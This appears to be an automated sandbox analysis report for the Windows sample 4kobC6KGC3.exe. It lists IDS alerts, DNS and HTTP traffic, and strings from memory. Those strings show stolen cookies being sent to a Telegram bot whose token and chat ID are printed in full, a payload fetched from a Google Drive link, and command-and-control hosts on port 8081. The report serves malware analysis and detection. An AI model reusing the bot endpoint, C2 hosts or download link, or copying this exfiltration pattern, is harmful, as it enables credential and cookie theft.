Source: global traffic	HTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd603c4f928882Host: api.telegram.orgContent-Length: 2064

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49758 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49760 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49764 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49762 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49756 -> 142.251.32.110:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49761 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49767 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49763 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49765 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49766 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.64.1:443 -> 192.168.11.20:49759 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/03/2025%20/%2001:30:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038285000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd603c4f928882Host: api.telegram.orgContent-Length: 2064

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 05:30:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50953102950.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50953102950.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 4kobC6KGC3.exe, 00000000.00000002.50856626273.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 4kobC6KGC3.exe, 00000000.00000000.49420945432.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 4kobC6KGC3.exe, 00000002.00000000.50855236832.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50953102950.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038180000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000380A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000380A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000380A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000380A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20a
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.0000000007960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ
Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQQ
Source: 4kobC6KGC3.exe, 00000002.00000003.50985470415.0000000007A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: 4kobC6KGC3.exe, 00000002.00000003.50985470415.0000000007A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/2
Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.0000000007A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/X
Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.0000000007960000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=download
Source: 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=downloadk
Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.0000000007960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=downloadx
Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.0000000007A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/l
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eicar.org/
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FB000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FD000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381AD000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FB000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FB000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FB000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50953102950.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.000000003803A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.000000003803A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.000000003803A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.227.220
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
